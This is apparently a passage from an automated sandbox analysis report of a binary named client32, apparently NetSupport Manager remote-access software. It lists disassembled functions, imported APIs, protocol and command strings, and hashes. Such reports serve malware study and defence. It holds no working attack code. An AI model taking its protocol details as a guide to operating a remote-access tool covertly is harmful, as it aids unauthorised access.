                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$__calloc_crt$___freetlocinfo___removelocaleref$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 888903860-0
                                                                                                                                        • Opcode ID: a860b2999916d22be514ee2e379c398ef214d0b79ce1b1fc77e704e4b86bfe3f
                                                                                                                                        • Instruction ID: dee905e399a5917069a1c07ad4606cc94828cce8947060f783cf69d72a9e4bee
                                                                                                                                        • Opcode Fuzzy Hash: a860b2999916d22be514ee2e379c398ef214d0b79ce1b1fc77e704e4b86bfe3f
                                                                                                                                        • Instruction Fuzzy Hash: BA21293968C60DFBF7265F28DC04D1AB7F8DFA2798B904469F4E466250EF31D800DA55
                                                                                                                                        Function 68900F59 Relevance: 23.0, APIs: 3, Strings: 10, Instructions: 263COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 6890DBD0: _malloc.LIBCMT ref: 6890DBE9
                                                                                                                                          • Part of subcall function 6890DBD0: wsprintfA.USER32 ref: 6890DC04
                                                                                                                                          • Part of subcall function 6890DBD0: _memset.LIBCMT ref: 6890DC27
                                                                                                                                        • _memset.LIBCMT ref: 68900FAD
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901293
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 689012E3
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,68930E3D,?,?,?,?,?,?,00000000), ref: 68901316
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,00000000), ref: 6890132D
                                                                                                                                        • std::exception::exception.LIBCMT ref: 6890135B
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 68901376
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave_memset$Exception@8Throw_mallocstd::exception::exceptionwsprintf
                                                                                                                                        • String ID: CAP$ENC$END_REC$FLG$MORE$RESULT$TIM$TXT$UID$b
                                                                                                                                        • API String ID: 275297366-914382535
                                                                                                                                        • Opcode ID: a5a294adbd8004396a39974843de7c165da1a6090a80b73a65300481d719b7a0
                                                                                                                                        • Instruction ID: 77ac8155906e829c091e411792d0a4518338b3829c3c043e77d2f59d68a523c0
                                                                                                                                        • Opcode Fuzzy Hash: a5a294adbd8004396a39974843de7c165da1a6090a80b73a65300481d719b7a0
                                                                                                                                        • Instruction Fuzzy Hash: E09153B5D042696FDF20DFA89C41AFE76B4AF15308F80057ED55AE6201F731CA48CB96
                                                                                                                                        Function 688FE510 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 195COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        • _free.LIBCMT ref: 688FE569
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FE59B
                                                                                                                                          • Part of subcall function 688F7090: _free.LIBCMT ref: 688F709E
                                                                                                                                        • _free.LIBCMT ref: 688FE5C9
                                                                                                                                        • _free.LIBCMT ref: 688FE5FB
                                                                                                                                        • __strdup.LIBCMT ref: 688FE665
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__strdup__vswprintf_malloc
                                                                                                                                        • String ID: CMD=PUBLISHSERVICE$CSPEC=%s$MODE=%s$NAME=%s$PublishService failed, err=%d$TYPE=%s$publish$revoke
                                                                                                                                        • API String ID: 1683320226-3494810577
                                                                                                                                        • Opcode ID: 40a9dad6a959eaf470b682f511d6fd4ed7d5fba0de43299d9fe17bfd0dea3b3b
                                                                                                                                        • Instruction ID: 925dc48b18f6f2e981f3b0e7ca29f862eafd7e035fc01d4f1404db08c0725c5a
                                                                                                                                        • Opcode Fuzzy Hash: 40a9dad6a959eaf470b682f511d6fd4ed7d5fba0de43299d9fe17bfd0dea3b3b
                                                                                                                                        • Instruction Fuzzy Hash: AA51B9BAD00249AFDB10DFA8DC809BF77B8EF94258B80893DE52597600E735F546C7A1
                                                                                                                                        Function 11027130 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 174windowlibraryCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • LoadLibraryExA.KERNEL32(PCIRES,00000000,00000000), ref: 110271C0
                                                                                                                                        • LoadIconA.USER32(00000000,00007D0B), ref: 110271D5
                                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 110271EE
                                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 110271F3
                                                                                                                                        • LoadImageA.USER32(00000000,00007D0B,00000001,00000000), ref: 11027203
                                                                                                                                        • LoadIconA.USER32(11000000,00000491), ref: 1102721B
                                                                                                                                        • GetSystemMetrics.USER32(00000032), ref: 1102722A
                                                                                                                                        • GetSystemMetrics.USER32(00000031), ref: 1102722F
                                                                                                                                        • LoadImageA.USER32(11000000,00000491,00000001,00000000), ref: 11027240
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Load$MetricsSystem$IconImage$Library__wcstoi64
                                                                                                                                        • String ID: AdminUserAcknowledge$PCIRES$_License$product
                                                                                                                                        • API String ID: 1946015-1270847556
                                                                                                                                        • Opcode ID: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                        • Instruction ID: 7d40fe3dfb7a436b35654b91f1e6e13152f39ea3f8258807fefd6660e2433123
                                                                                                                                        • Opcode Fuzzy Hash: b5081cdd9087fe896703f36cdb24c0bbd67552c611d9c1bb16947e5bd2980717
                                                                                                                                        • Instruction Fuzzy Hash: 00513775F40B176BEB11CAA48C81F6FB6AD9F55708F504025FE05E7281EB70E904C7A2
                                                                                                                                        Function 68904500 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 160sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904575
                                                                                                                                        • LeaveCriticalSection.KERNEL32 ref: 6890458A
                                                                                                                                        • GetTickCount.KERNEL32 ref: 6890461C
                                                                                                                                        • GetTickCount.KERNEL32 ref: 68904627
                                                                                                                                        • Sleep.KERNEL32(00000014), ref: 6890463E
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898), ref: 68904661
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(6893B898,00000000,?,00000000,?,688FD77B,00000000), ref: 688F63E8
                                                                                                                                          • Part of subcall function 688F63C0: InterlockedDecrement.KERNEL32(-0003F3B7), ref: 688F63FA
                                                                                                                                          • Part of subcall function 688F63C0: EnterCriticalSection.KERNEL32(-0003F3CF,?,00000000,?,688FD77B,00000000), ref: 688F6412
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F643B
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F646F
                                                                                                                                          • Part of subcall function 688F63C0: GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 688F64A3
                                                                                                                                          • Part of subcall function 688F63C0: _memset.LIBCMT ref: 688F65C8
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(?,?,688FD77B,00000000), ref: 688F65D7
                                                                                                                                          • Part of subcall function 688F63C0: LeaveCriticalSection.KERNEL32(6893B898,?,00000000,?,688FD77B,00000000), ref: 688F65F2
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898), ref: 6890469A
                                                                                                                                        • SetLastError.KERNEL32(00000000), ref: 689046A4
                                                                                                                                        • SetLastError.KERNEL32(00000057), ref: 689046C5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$AddressProc$CountErrorLastTick$DecrementInterlockedSleep_memset
                                                                                                                                        • String ID: CMD=REMOVEDOMAIN$GSK=********$GUID=%s
                                                                                                                                        • API String ID: 3052827841-3462777587
                                                                                                                                        • Opcode ID: 0c76976de0cb6e94d9ccf53ba804d4d43b265439700e0b9f56fe77f3dc2610dd
                                                                                                                                        • Instruction ID: 3504d137c8492c16e337ff30d037f1c9a13c357d50deb84ca110bc1606c76887
                                                                                                                                        • Opcode Fuzzy Hash: 0c76976de0cb6e94d9ccf53ba804d4d43b265439700e0b9f56fe77f3dc2610dd
                                                                                                                                        • Instruction Fuzzy Hash: B1517175A08319EFCB20DFA8C884AAEB7B9EB44309F40452DE605D7240E771DA44CBA1
                                                                                                                                        Function 688F9E20 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 152COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F9EF8
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __wcstoui64_memset_strncpy
                                                                                                                                        • String ID: 1.0$CMPI$FAILED_REASON$Gateway rejected client connection because licence was exceeded.$Gateway rejected client connection because security check failed.$MAC$MAXPACKET$PROTOCOL_VER$RESULT$SERVER_VERSION$e:\nsmsrc\nsm\1210\1210f\ctl32\htctl.c$strlen(p) == 12
                                                                                                                                        • API String ID: 2670788892-1257448691
                                                                                                                                        • Opcode ID: 3de22defb18497ef8bba7b0525a572efa4741872c8f9cecd3dc98cab1ee0f515
                                                                                                                                        • Instruction ID: 5fa6217f6458e18b0f3da54bad4ffb6238a28061f5b7d035a87f3059bb7dc976
                                                                                                                                        • Opcode Fuzzy Hash: 3de22defb18497ef8bba7b0525a572efa4741872c8f9cecd3dc98cab1ee0f515
                                                                                                                                        • Instruction Fuzzy Hash: DE4129A9D086227BEF209B78DC01B7F35A49F52399FC40438F815D6641F766D612C7E2
                                                                                                                                        Function 6892C34D Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • UnDecorator::getBasicDataType.LIBCMT ref: 6892C388
                                                                                                                                        • DName::operator=.LIBCMT ref: 6892C39C
                                                                                                                                        • DName::operator+=.LIBCMT ref: 6892C3AA
                                                                                                                                        • UnDecorator::getPtrRefType.LIBCMT ref: 6892C3D6
                                                                                                                                        • UnDecorator::getDataIndirectType.LIBCMT ref: 6892C453
                                                                                                                                        • UnDecorator::getBasicDataType.LIBCMT ref: 6892C45C
                                                                                                                                        • operator+.LIBCMT ref: 6892C4EF
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Decorator::getType$Data$Basic$IndirectName::operator+=Name::operator=operator+
                                                                                                                                        • String ID: std::nullptr_t$volatile
                                                                                                                                        • API String ID: 2203807771-3726895890
                                                                                                                                        • Opcode ID: 6b84308bab2acdb725695dcada5386c048d5b74aa1d60a51cc96e68152486eb8
                                                                                                                                        • Instruction ID: 94cf04fbe957038e1feed0fd33eb98e88b3a54650a732462c35b2305be8684c4
                                                                                                                                        • Opcode Fuzzy Hash: 6b84308bab2acdb725695dcada5386c048d5b74aa1d60a51cc96e68152486eb8
                                                                                                                                        • Instruction Fuzzy Hash: 0141D432968119EFCB208F98C864DBF7BB8FB1A30CFC04465E9656725AC730DA41CB91
                                                                                                                                        Function 688FC120 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 124COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 688FC158
                                                                                                                                          • Part of subcall function 68911BFD: HeapFree.KERNEL32(00000000,00000000), ref: 68911C13
                                                                                                                                          • Part of subcall function 68911BFD: GetLastError.KERNEL32(00000000), ref: 68911C25
                                                                                                                                        • _free.LIBCMT ref: 688FC1A2
                                                                                                                                        • _free.LIBCMT ref: 688FC1E8
                                                                                                                                        • _free.LIBCMT ref: 688FC21C
                                                                                                                                          • Part of subcall function 688F5060: _free.LIBCMT ref: 688F506A
                                                                                                                                          • Part of subcall function 688F5060: _malloc.LIBCMT ref: 688F5090
                                                                                                                                          • Part of subcall function 68907D00: __vswprintf.LIBCMT ref: 68907D26
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast__vswprintf_malloc
                                                                                                                                        • String ID: AT=%d$CAP=%s$DEP=%s$FMASK=%d$FROM=%I64u$MAX=%d$ORO=%s$ORU=%s$TO=%I64u
                                                                                                                                        • API String ID: 3180605519-2647812726
                                                                                                                                        • Opcode ID: e20069b30f5ecf24976bd4cb7cea6b7945bb9095cb43d3bcf2666728fad7126c
                                                                                                                                        • Instruction ID: d708cad75fabaf7f8b7ae052334137a33f8686129305894bd139133945f87445
                                                                                                                                        • Opcode Fuzzy Hash: e20069b30f5ecf24976bd4cb7cea6b7945bb9095cb43d3bcf2666728fad7126c
                                                                                                                                        • Instruction Fuzzy Hash: C04192B96402187FE7029A25CC80F7F33ACDF96554F848919F82997642EB35EA01CBB5
                                                                                                                                        Function 68910970 Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 100libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • LoadLibraryA.KERNEL32(ws2_32.dll), ref: 689109A6
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 689109C3
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 689109CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,socket), ref: 689109DB
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,closesocket), ref: 689109E9
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,WSAIoctl), ref: 689109F7
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 68910A6C
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc$Library$FreeLoad
                                                                                                                                        • String ID: WSACleanup$WSAIoctl$WSAStartup$closesocket$socket$ws2_32.dll
                                                                                                                                        • API String ID: 2449869053-2279908372
                                                                                                                                        • Opcode ID: e7efd76d548f83fed70253e753d838196c5fe5638308f7130d5a4b2ba2459926
                                                                                                                                        • Instruction ID: 8b8d17fc65479ce4268178d8035ac035e6d5fabdbabb79cf3bc04277632377de
                                                                                                                                        • Opcode Fuzzy Hash: e7efd76d548f83fed70253e753d838196c5fe5638308f7130d5a4b2ba2459926
                                                                                                                                        • Instruction Fuzzy Hash: 4331C971B452286FDB249B748C59FEE77B8EF86314F404195F949A7280DB709D40CF91
                                                                                                                                        Function 688F6190 Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 129COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 68907BE0: _memset.LIBCMT ref: 68907BFF
                                                                                                                                          • Part of subcall function 68907BE0: _strncpy.LIBCMT ref: 68907C0B
                                                                                                                                        • __wcstoui64.LIBCMT ref: 688F622B
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,-000397EB,?,?,68902C4D), ref: 688F62AF
                                                                                                                                        • _strncpy.LIBCMT ref: 688F62E5
                                                                                                                                        • _free.LIBCMT ref: 688F62FB
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,?,?,?,?,?,?,?,?,?,68902C4D), ref: 688F631D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection_strncpy$EnterLeave__wcstoui64_free_memset
                                                                                                                                        • String ID: 1.0$CLIENT_NAME$CONNECTION_ID$FAILED_REASON$PROTOCOL_VER$RESULT$SERVER_VERSION
                                                                                                                                        • API String ID: 2226502904-1282845728
                                                                                                                                        • Opcode ID: a500e12cad25e66925296d7c2e6653e808ac332321dd8bdea8b4f1708e85e05f
                                                                                                                                        • Instruction ID: a8fce5a34a509da662a1494c10802b14c43881f26f93844f66419e0922d4509f
                                                                                                                                        • Opcode Fuzzy Hash: a500e12cad25e66925296d7c2e6653e808ac332321dd8bdea8b4f1708e85e05f
                                                                                                                                        • Instruction Fuzzy Hash: E04114B8D08625BBDF20DF68DC8097E7BB4ABA1354F904639E815DB200F331D65187A2
                                                                                                                                        Function 68907E60 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 105libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 68907E8D
                                                                                                                                        • LoadLibraryA.KERNEL32(iphlpapi.dll,00000000,00000000,00000000,00000010,?,?), ref: 68907E9A
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 68907EB3
                                                                                                                                        • _malloc.LIBCMT ref: 68907ED8
                                                                                                                                        • _memmove.LIBCMT ref: 68907F20
                                                                                                                                        • _free.LIBCMT ref: 68907F31
                                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 68907F3D
                                                                                                                                        • _memmove.LIBCMT ref: 68907F5F
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
